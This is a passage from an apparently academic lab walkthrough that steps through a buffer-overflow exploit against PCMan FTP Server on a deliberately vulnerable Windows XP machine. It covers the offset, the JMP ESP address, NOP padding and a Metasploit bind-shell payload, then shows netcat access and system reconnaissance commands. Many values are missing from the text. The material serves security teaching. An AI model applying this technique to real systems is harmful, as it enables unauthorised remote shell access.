- Example: ./fuzzer7.pl
21 2003

- fuzzer7.pl view Header, Junk and EIP
- Instructions:
- Scroll Down to Line 38 to
observe the ($header) variable.
- Scroll Down to Line 45 to
observe the ($junk) variable.
- Scroll Down to Line 46 to
observe the ($eip) variable.
- Note(FYI):
- Arrow #1, The
($header) variable contains the following string(USER
- Arrow #2, The
($junk) variable contains the number of A's multiple by <OFFSET_COUNT>.
- Arrow #3, The ($eip)
variable contains the static JMP ESP memory location for

- fuzzer7.pl view NOPS and BUF
- Instructions:
- Scroll Down to Line 61 to
observe the ($nops) variable.
- Scroll Down to Line 70 to
observe the ($buf) variable.
- Note(FYI):
- Arrow #1, The ($nops)
variable contains 20 spaces(x90) to prevent the shell code from
being truncated.
- Arrow #2, The ($buf) variable is
set to the payload value generated for (windows/shell_bind_tcp).

- fuzzer7.pl view STRING and SOCKET
- Instructions:
- Scroll Down to Line 129
to observe the ($string) variable.
- Scroll Down to Line 131
to observe the ($socket) variable.
- Scroll Down to Line 141
to observe the
send function.
- Scroll Down to Line 146
to observe the close function.
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrow #1, The
($string) variable is composed of the following contents:
- Arrow #2, Use the
($socket) variable to open a TCP Network Connection to PCMan's IPADDRESS over
- Arrow #3, Use the
$socket->send($string) function to send the string to PCMan.
- Arrow #4, Use the
close($socket) function to close the network connection.

Section 20: PCMan -
It's Exploit Time!!! |
- Section Notes
- Notes(FYI):
- In the previous sections, we learned
how to use both msfpayload and msfencode to create the (windows/shell_bind_tcp)
payload in a perl format (-t
perl -e x86/alpha_upper).
- Now let's have some fun.
- This section will put everything
together, thereby allowing our fuzzer7.pl perl script to overwrite
the EIP with the JMP ESP static memory location and placing our
payload running in memory on Damn Vulnerable Windows listening over
port 5555 for a netcat connection. :->
- I feel like we have been building up to
implementing Crain Technique in Karate Kid I.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Placing the Payload(On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Replace (2003)
with the offset you obtain from (Section 7, Step 14)
- Instructions:
- ./fuzzer7.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer7.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that the username that we
will be supplying will follow the string (USER
- (AAAA(2003)AAAA's...)
- This is our extra long username that contains the number
of (A's) that was specified from your offset. Remember
we determined that 2003
bytes occur (in my case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP for the
SHELL32.dll. This JMP ESP address will allow
fuzzer7.pl to place our payload into memory.
- (NOPS)
- NOPS, means NO CPU OPerationS.
Accordingly, (x90) is the hexadecimal representation of the
NOPS operation. We add 20 spaces of padding (x90) between
the SHELL32.dll JMP ESP(D7309D7C)
to ensure the payload is not truncated. Consequently, a
truncated payload will not execute.
- The payload(windows/shell_bind_tcp)
was generated by (msfpayload) to listen on port(5555) if
successfully executed.

- Connecting with NetCat
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- nc
- cd C:\
- echo %USERNAME%
- tasklist
- netstat -ano
- Note(FYI):
- Arrow #1, Use
netcat(nc) to connect to Damn Vulnerable WXP-SP2(
over port(5555). Remember earlier we used msfpayload to
generate (windows/shell_bind_tcp)
that if executed successfully would create a listener on port(LPORT=5555).
- Arrow #3, Use
(echo %USERNAME%) to display the owner (ie username) of the PCMan
- Arrow #4, Use (tasklist)
to display all the running processes. Use the redirect
operator(>) to
output the tasklist process into the (C:\BUFFER\PCMan\pof.txt) file.
- Arrow #5, Use (netstat
-nao) to display all the network connections. Use the append
to output all the network connections to the end of the
(C:\BUFFER\PCMan\pof.txt) file.

- Basic Operation System Interrogation
- Instructions:
- systeminfo | findstr "OS
- Note(FYI):
- Arrow #1, Use (systeminfo)
to display system configuration information. Use (findstr) to
only display output that contains the string(OS

- Open the Command Prompt
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->
Command Prompt
- Proof of Lab
- Instructions:
- netstat -nao | findstr "5555"
- Record your PID. Mine is (568).
- type C:\BUFFER\PCMan\pof.txt | findstr
- Replace my PID(568)
with your PID.
- date /t
- echo "Your Name"
- Put in your actual name in place of
"Your Name"
- e.g., echo "John Gray"
- Note(FYI):
- Arrow #1, Use (netstat) to
show all(-nao) network connections. Use (findstr) to display only the
network connections containing the string(5555), which is the
payload (windows/shell_bind_tcp) that was placed and executed using
- Arrow #2,
Use (type) to display the contents of the file(pof.txt). Use (findstr)
to display the output that contains the string(568), which is my PID
of the payload listener. Your PID will be different.
Proof of Lab
- Press the <Ctrl> and <Alt> key at the
same time.
- Press the <PrtScn> key.
- Paste into a word document
- Upload to Moodle

